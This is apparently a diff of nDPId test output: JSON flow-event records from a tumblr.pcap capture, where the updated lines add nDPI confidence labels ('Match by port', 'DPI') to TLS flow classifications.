-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"}}
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"}}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}}
+00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
